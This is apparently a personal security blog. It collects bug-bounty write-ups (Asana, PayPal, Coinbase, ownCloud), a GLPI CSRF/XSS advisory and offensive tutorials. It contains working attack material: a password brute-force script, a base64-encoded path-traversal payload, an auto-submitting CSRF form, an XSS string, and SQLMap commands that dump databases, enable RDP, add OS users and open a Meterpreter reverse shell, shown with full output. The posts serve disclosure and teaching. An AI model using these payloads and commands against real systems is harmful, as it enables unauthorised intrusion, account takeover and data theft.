Wednesday, October 9, 2013

Hijack User accounts via cached Invite links! #Asana #bugbounty

A few weeks back a friend of mine mentioned to me about Asana's bug bounty program. Although I did not see any mention of reward money in their security page I still thought of giving it a try. After reading a little about the company I found that www.asana.com is a portal where a team can share the resources and organize its work i.e. kind of a project management software.
I created an account and started poking around and checked for obvious vulnerabilities such as XSS and CSRF. The application appeared to be decent but there was always some scope for a few logical vulnerabilities.
The application allowed creation of new projects followed by addition of new users by sending them invite links.
These invite links looked like these (https://app.asana.com/app/asana/-/register?invite=XXXXXX), so I thought of trying my luck with these links.


By using a few Google dorks I was able to get a list of invite links which were cached by Google and to my surprise they were still active. 


 So I collected a list of cached invite links and tried creating an account and voila!! it worked smoothly as I expected. I was able to login into a valid user account by creating a new password. 





I reported this issue to asana security team and they were very quick in responding to my emails. The issue got fixed within no time and they rewarded me for the same.

Tuesday, October 1, 2013

My lazy attempt towards python! #BeautifulSoup #Requests

Inspired by the amazing null humla session that I attended I thought of writing my own simple login-brute-force in python using requests. There are a lot of brute-forcing scripts in the market but I thought of writing my own.
I love the Requests library for python, as the author says "Its HTTP for Humans" it actually is. I really encourage using this library at least once if one wants to start learning python web scraping.
I have also used BeautifulSoup library to extract few HTML tags. The website which I have used is http://www.testfire.net, which is a vulnerable bank application developed by IBM for web app testing.
The script is used to brute force all possible passwords against a single user name "admin". I initially tried writing it with cookiejar but some how the code got little lengthier but then Requests came to my rescue.
The script opens a file called 'password.txt' containing a list of random passwords to brute force. In this case the correct password is "admin", with Requests library it is possible to intercept the request in a proxy before hitting the server. Here I am running a proxy on port 8082 just to see the data what my script is sending.Feel free to use the script (for learning purpose only), here is the gist link.

#Author: Prajal Kulkarni
import requests
import sys
from bs4 import BeautifulSoup as BS


proxyDict = {"http":"127.0.0.1:8082"}

url = "http://www.testfire.net/bank/login.aspx"

def connect(url,m):
    t = requests.post("http://www.testfire.net/bank/login.aspx", data=m, proxies=proxyDict)
    print t.text
    soup = BS(t.text)
    a=soup.find('a', id="_ctl0__ctl0_Content_AccountLink")
    x = str(a.string)
    print x
    if x == "MY ACCOUNT" :
        print "The pass is" + " " + m['passw']
        sys.exit()
    else:
        print "Password %s not working" %m['passw']

def controller():
    m = {}
    f=open('password.txt','r').read().split('\n')
    for line in f:
          m["uid"] = "admin"
          m["passw"] = str(line)
          m["btnSubmit"] = "Login"
          print m
          connect(url,m)

controller()



Wednesday, September 25, 2013

Arbitrary File Upload in Paypal's http://apps.paypal.com

This was one of many vulnerabilities that I had found in http://apps.paypal.com as a part of their bug bounty program. This is one of their developer portals which is hosted on Apache/2.2.22 and running Drupal 7. I reported this issue to Paypal on May 19 2013. 
Here are some of the details of the bug:
After logging into the portal we can create applications suited to the developer environment and with this it allowed to upload supporting files (Ad Hoc files required for mobile app submissions). I uploaded a simple "txt" file and it generated an external link to the file (https://apps.paypal.com/system/files/test_###.txt).


The upload allowed all type of extensions (*.jpg,*.txt,*.gzip,*.php,*.jar,*exe etc) and didn't validate the same on the server end. I tried uploading a simple php shell but sadly it didn't work :(.
I tried the "XSS via SWF upload" which was blogged by Soroush Dalili (here for more details). I uploaded the "xssproject.swf" file and got an external link (https://apps.paypal.com/system/files/xssproject.swf).









The vulnerability was fixed immediately after it was reported to the security team.
Happy hunting!! cheers!!

Tuesday, June 4, 2013

SSRF/XSPA Bug in https://www.coinbase.com

This was one of the bugs which i had reported to Coinbase.com on May 1 2013 as apart of their bug bounty program. Although I started quite late in hunting I was lucky enough to find one interesting vulnerability in their "Merchant_settings" portal. 

The vulnerability is an SSRF/XSPA which allows an attacker to use the application as a proxy to scan for other services on remote servers on the internet. So in layman terms this vulnerability can be abused to port scan other servers on the internet. 

Here is the POC that I had submitted to coinbase. I used "scanme.nmap.org" which is known to have ports 22 and 80 opened.
In their "merchant_settings" they had a field wherein we can enter a URL for receiving instant payment notifications. And the field was not validated on the server end for any back-end response sent by the remote servers before displaying, this functionality allowed to do things like banner grabbing, port scanning, identify web-application frameworks etc.


Here is an example of an open port (22) on "scanme.nmap.org" which fetched me the open-ssh version.
#http://scanme.nmap.org:22/index.html




Here is what I received on entering a closed port (2243)
#http://scanme.nmap.org:2243/index.html



This functionality could have been abused in many ways one of them would be automating the attack and making multiple request to remote servers on  well known ports. The Coinbase secuity team has already fixed this vulnerability but i was quite disappointed when i received a bounty which was lesser than the minimum bounty they had promised on their responsible disclosure page i.e a payout of 5BTC.
The security team responded saying "We can't be sure of how this vulnerability could affect our coinbase users, and we issue bounties for only those vulnerabilities which affect our userbase". Any ways I can't say I wasn't disappointed but yes they should have delivered what they had promised on their responsible disclosure page.

Wednesday, March 20, 2013

Local File Inclusion Vulnerability in bugs.owncloud.org - CVE-2013-1761


Last year when i was finding vulnerabilities in owncloud.org i came across a Local file inclusion vulnerability in one of the subdomains of owncloud.org

A Little more insight on LFI:
Its a vulnerability which allows to read files which are present locally on the server having read permissions or one can also call it a dynamic execution of interpreted code loaded from a file . The attack can be serious when the application allows to read files which are located outside the root directory, which can be done using characters like ../../../../../../  or a ..%2F..%2F..%2F..%2F . This is actually to traverse outside the root directory and to access the files system.
Few php LFI examples:
<?php $test = $_GET['id']; 
 if(isset($test)) { include("pages/$test"); }
 else { include("index.php"); }
?>
In the above example the id parameter is not sanitized to filter out malicious characters like "..%2F", It is easily possible to access any file which is locally stored on the system outside the root directory.

Now coming back to owncloud the  website was bugs.owncloud.org and there was a parameter named "files=" which would fetch the requested file from the server. The parameter was not validating the user input at the server end so it was pretty simple to read any local files having read permissions.

Vulnerable URL: http://bugs.owncloud.org/thebuggenie/serve&g=css&files=

The "files" parameter was taking a base64 encoded value which was further decoded at the server end. So i encoded the value for ../../../../../../etc/passwd as Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== and accessed it "http://bugs.owncloud.org/thebuggenie/serve&g=css&files=Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==" this read out the most important file from the server.

I reported the vulnerability to owncloud and they replied saying its a issue with "The Bug Genie". Lukas Reschke helped me to get in touch with the Bug Genie developers. They realized the criticality of the bug and quickly rolled out a fix within a week and assigned me a CVE id "CVE-2013-1761". They also acknowledged my contribution on their new software release here.

I also want to mention Lukas Reschke for helping me get a CVE id.

Tuesday, October 16, 2012

Multiple CSRF and XSS vulnerabilities in GLPI - CVE-2012-4002/CVE-2012-4003

Few months back when i was researching on few resource management softwares i came across this amazing Resource manager (GLPI). After deploying it on my xampp server i started my initial phase of finding bugs.
The installed version of GLPI was 0.83.2 which i found was having multiple CSRF issues, some of the important functions which includes adding new users or raising a ticket lacked a proper CSRF mitigation.




I found that most of the user related tasks were vulnerable to CSRF attack. Here is a small POC on adding a new user. The page at http://<localhost>/glpi/front/preference.php allows us to add a user.



And after clicking on update the following POST request is sent to the server.


POST http://localhost/glpi/front/preference.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Proxy-Connection: keep-alive
Cookie: PHPSESSID=bstsomr0qf11n0446gqai8gp03
Content-Type: application/x-www-form-urlencoded
Content-Length: 72

name=glpi&id=2&realname=Attacker&language=en_GB&use_mode=0&update=Update

Since there is no CSRF token in the post request an attacker can easily create a html page and send to a logged-in administrator and can create him as an authenticated user without the administrator knowing about it.





Html POST-CSRF eg:

<html>
<body onload=csrf.submit()>
<form id="csrf" name="csrf" action="http://localhost/glpi/front/preference.php" method="POST">
<input type=hidden name="name" id="name" value="glpi"/>
<input type=hidden name="id" id="id" value="2"/>
<input type=hidden name="realname" id="realname" value="Attacker"/>
<input type=hidden name="language" id="language" value="en_GB"/>
<input type=hidden name="use_mode" id="use_mode" value="0"/>
<input type=hidden name="update" id="update" value="Update"/>
</form>
</body>
</html>




 Here are few more locations which didn't had CSRF protection:

http://localhost/glpi/front/user.form.php?id=3
http://localhost/glpi/front/user.form.php?id=2
http://localhost/glpi/front/user.form.php?id=5
http://localhost/glpi/front/user.form.php?id=4
http://localhost/glpi/front/user.form.php?new=1
http://localhost/glpi/front/profile.form.php?id=3
http://localhost/glpi/front/ruleimportcomputer.form.php
http://localhost/glpi/front/popup.php?popup=edit_bookmark
http://localhost/glpi/front/group.form.php
http://localhost/glpi/front/entity.form.php
http://localhost/glpi/front/popup.php
http://localhost/glpi/front/auth.settings.php
http://localhost/glpi/front/crontask.php?execute=*
http://localhost/glpi/front/fieldunicity.form.php
http://localhost/glpi/front/config.form.php
http://localhost/glpi/front/notificationmailsetting.form.php
http://localhost/glpi/front/*?reset=reset
http://localhost/glpi/front/backup.php?


Apart from CSRF the application also had an XSS flaw at http://localhost/glpi/front/config.form.php where there was an option we could provide text on login. This parameter was not sanitized from the back end and it would easily accept any malicious characters. A simple "><script>alert(1)</script> would prompt 1 on the login screen.






The GLPI security team was very prompt and cooperative in handling all my reported issues. And a few weeks back they came up with a new secure version of GLPI 0.83.3 with XSS and CSRF protection.

Thanks GLPI team for acknowledging me on their new software release (click).





Monday, October 8, 2012

SQL Injection made simple

SQL injection has been ruling the OWASP top ten for many years. It is the most powerful and feared vulnerability among all. It is "THE BAAP" of all living vulnerabilities found till date, thus finding it and further exploiting it becomes a challenge sometimes. There are zillions of ways to identify but some times exploiting the right way becomes a challenge for a pentester.
Here is an easy method for beginners to expert level for sql exploitation using my favorite tool SqlMap.
SqlMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections

SQL injection attacks are the one in which SQL commands are injected into data-plane in order to affect the execution of predefined SQL statements.
SQL injection can lead into :
a) DBMS data manipulation
b) File system read and write access
c) Operating system control

SQLMAP- http://sqlmap.courceforge.net
INTRO>>            An open source command-line tool
                          Detects and exploits SQL injection flaws in Web applications
                          Developed in Python -july 2006

           
KEY FEATURES>>    Full support for MySQL,PostgreSQL,Oracle,MSSQL


TECHNIQUES>>           Boolean-based blind
                                    Union query
                                    stacked(batched) query
               
It does an extensive back-end DBMS fingerprint, Enumerates users, passwords, databases, tables, and columns.

Disclaimer: Please do not test it on any live website without prior permission of the website owner. The author assumes no liability and is not responsible for any damage caused. I recommend hosting Mutillidae/Webgoat/DVWA on a virtual machine to practice (I have used Mutillidae to explain beginner level exploitation (more info on Mutillidae could be found here)  for advance level i have used a custom made web application designed by our team *webmart(aspx/mssql) )

Prerequistes>> Backtrack5 (www.backtrack-linux.org)


Here we go!!

One of my favorite combination of commands to start with!

a) python sqlmap.py -u "http://abc/mutillidae/index.php?page=login.php" --level=3 --forms --batch --banner --flush-session

This would fetch you many things like the back-end Database, banner grab, and it will also do a form search on the page and see if any of the parameter are injectable. As shown below the database is MySQL 5.0, the parameter username is injectable and the platform is php 5.3.3 on Apache 2.2.16. Woooaaa! tats a lot of info on first run.
















b) python sqlmap.py -u "http://abc/mutillidae/index.php" --level=3  --data="username=test&password=test&login-php-submit-button=Login" --flush-session --tables --dbs --batch

Here we are providing the POST data (username=test&password=test&login-php-submit-button=Login) and telling sqlmap to enumerate all the table entries and use the default behavior without asking user input. The current user running is  'root@localhost'. Here we have a lot of info to understand the back-end of the application.

Few more ways for to dump database.

python sqlmap.py -u "http://abc/mutillidae/index.php" --level=3  --data="username=test&password=test&login-php-submit-button=Login" --flush-session --tables --dump-all -D "database to enumerate" --batch






Enumerate table Columns:

python sqlmap.py -u "http://abc/mutillidae/index.php" --level=3  --data="username=test&password=test&login-php-submit-button=Login" --flush-session -D "database to enumerate" -T "table name" --columns --batch

Now if the column names are not common enough to enumerate then brute forcing is a better option. For a brute force check:
python sqlmap.py -u "http://abc/mutillidae/index.php" --level=3  --data="username=test&password=test&login-php-submit-button=Login" --flush-session -D "database to enumerate" -T "table name" --common-tables --common-columns --batch

These are some of the easy ways to do SQL injection. Now raising the bar a little high we will try exploiting a Windows system running MSSQL 2005. Here sqlmap first uploads a dynamic-linked library (DLL) used afterwards to create two user-defined functions (sys_exec() and sys_bineval()) in the database it also uses a stored procedure (xm_cmdshell) to further exploit. This is a built in stored procedure to execute commands used by MSSQL, it is enabled by default in MSSQL 2000, and for 2005 and 2008 it is disabled by default. This procedure can be also  re-enabled if the current session user is a member of sysadmin role. sp_configure stored procedure can be used to re-enable it [works fine on MSSQL 2005/08]

Here our final aim is to own the windows box hosting a webapplication (webmart) [aspx/mssql] but before that we will try doing some very awesome things with sqlmap.

Check If remote system has RDP enabled:
python sqlmap.py -u "http://abc/login.aspx" --data="__VIEWSTATE=/wEPDwUKMTAzMzQwOTkyOWRkVdcJb5TdgCbpISe88HswBmnhXq4=&username=test&password=test&Login=Login" --reg-read --reg-key="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" --reg-value=fDenyTSConnections --batch

If the output is a 0 then it is enabled if its 1 then its not. If its 1 then we can enable RDP remotely using sqlmap!

Enabling RDP using Sqlmap:
python sqlmap.py -u "http://abc/login.aspx" --data="__VIEWSTATE=/wEPDwUKMTAzMzQwOTkyOWRkVdcJb5TdgCbpISe88HswBmnhXq4=&username=test&password=test&Login=Login --reg-add --reg-key="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" --reg-value=fDenyTSConnections --reg-type=DWORD --reg-data=0 --batch

Create Users on the system using Operating system commands:
 python sqlmap.py -u "http://abc/login.aspx" --data="__VIEWSTATE=/wEPDwUKMTAzMzQwOTkyOWRkVdcJb5TdgCbpISe88HswBmnhXq4=&username=test&password=test&Login=Login" --os-cmd="net user newadmin test /add" --batch

 And finally to Pwn the remote system we will use (--os-pwn)

 python sqlmap.py -u "http://abc/login.aspx" --data="__VIEWSTATE=/wEPDwUKMTAzMzQwOTkyOWRkVdcJb5TdgCbpISe88HswBmnhXq4=&username=test&password=test&Login=Login" --os-pwn --batch

 Output:

     sqlmap/1.0-dev-cc3f387 - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual  consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 17:44:12

[17:44:13] [WARNING] you did not provide the local path where Metasploit Framework is installed
[17:44:13] [WARNING] sqlmap is going to look for Metasploit Framework installation into the environment paths
[17:44:13] [INFO] Metasploit Framework has been found installed in the '/usr/local/bin' path
[17:44:13] [INFO] resuming back-end DBMS 'microsoft sql server'
[17:44:13] [INFO] testing connection to the target url
[17:44:13] [INFO] sqlmap got a 302 redirect to 'http://abc:80/Errorpage.aspx'. Do you want to follow? [Y/n] Y
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwUKMTAzMzQwOTkyOWRkVdcJb5TdgCbpISe88HswBmnhXq4=&us                                              ername=test' AND 2076=CONVERT(INT,(CHAR(58)+CHAR(114)+CHAR(113)+CHAR(121)+CHAR(5                                              8)+(SELECT (CASE WHEN (2076=2076) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHA                                              R(99)+CHAR(106)+CHAR(112)+CHAR(58))) AND 'sdFw'='sdFw&password=test&Login=Login

    Type: UNION query
    Title: Generic UNION query (NULL) - 13 columns
    Payload: __VIEWSTATE=/wEPDwUKMTAzMzQwOTkyOWRkVdcJb5TdgCbpISe88HswBmnhXq4=&us                                              ername=-7964' UNION ALL SELECT CHAR(58)+CHAR(114)+CHAR(113)+CHAR(121)+CHAR(58)+C                                              HAR(73)+CHAR(121)+CHAR(81)+CHAR(121)+CHAR(109)+CHAR(103)+CHAR(90)+CHAR(89)+CHAR(                                              110)+CHAR(79)+CHAR(58)+CHAR(99)+CHAR(106)+CHAR(112)+CHAR(58),NULL,NULL,NULL,NULL                                              ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &password=test&Login=Login

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=/wEPDwUKMTAzMzQwOTkyOWRkVdcJb5TdgCbpISe88HswBmnhXq4=&us                                              ername=test'; WAITFOR DELAY '0:0:5'--&password=test&Login=Login

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __VIEWSTATE=/wEPDwUKMTAzMzQwOTkyOWRkVdcJb5TdgCbpISe88HswBmnhXq4=&us                                              ername=test' WAITFOR DELAY '0:0:5'--&password=test&Login=Login
---
[17:44:13] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[17:44:13] [INFO] how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
> 1
[17:44:13] [INFO] testing if current user is DBA
[17:44:13] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[17:44:16] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
[17:44:17] [INFO] testing if xp_cmdshell extended procedure is usable
[17:44:44] [INFO] heuristics detected web page charset 'ISO-8859-2'
[17:44:44] [INFO] the SQL query used returns 8 entries
[17:44:44] [INFO] retrieved: " "
[17:44:44] [INFO] retrieved: "1"
[17:44:44] [INFO] retrieved: "1"
[17:44:44] [INFO] retrieved: "1"
[17:44:44] [INFO] retrieved: "1"
[17:44:45] [INFO] xp_cmdshell extended procedure is usable
[17:44:45] [INFO] creating Metasploit Framework multi-stage shellcode
[17:44:45] [INFO] which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP
[4] Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS
[5] Bind TCP: Listen on the database host for a connection
> 1
[17:44:45] [INFO] which is the local address? [xyz]
[17:44:45] [INFO] which local port number do you want to use? [37597] 37597
[17:44:45] [INFO] which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
> 1
[17:44:45] [INFO] creation in progress .................................................................... done
[17:45:54] [INFO] uploading shellcodeexec to 'C:/Windows/Temp/shellcodeexec.x32.exe'
[17:45:54] [INFO] using a custom visual basic script to write the binary file content to file 'C:\Windows\Temp\shellcodeexec.x32.exe', please wait..
[17:46:07] [INFO] do you want confirmation that the file 'C:\Windows\Temp\shellcodeexec.x32.exe' has been successfully written on the back-end DBMS file system? [Y/n] Y
[17:46:07] [INFO] the file has been successfully written and its size is 6656 bytes, same size as the local file '/pentest/database/sqlmap/extra/shellcodeexec/windows/shellcodeexec.x32.exe'
[17:46:08] [INFO] running Metasploit Framework command line interface locally, please wait..
[*] The initial module cache will be built in the background, this can take 2-5 minutes...

     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||


       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 939 exploits - 501 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
       =[ svn r15798 updated 36 days ago (2012.08.30)

Warning: This copy of the Metasploit Framework was last updated 36 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             https://community.rapid7.com/docs/DOC-1306

PAYLOAD => windows/meterpreter/reverse_tcp
EXITFUNC => process
LPORT => 37597
LHOST => xyz
[*] Started reverse handler on xyz:37597
[*] Starting the payload handler...
[17:46:49] [INFO] running Metasploit Framework shellcode remotely via shellcodeexec, please wait..
[*] Sending stage (764928 bytes) to xyz
[*] Meterpreter session 1 opened (xyz:37597 -> abc:4189) at 2012-10-05 17:46:57 +0530

meterpreter >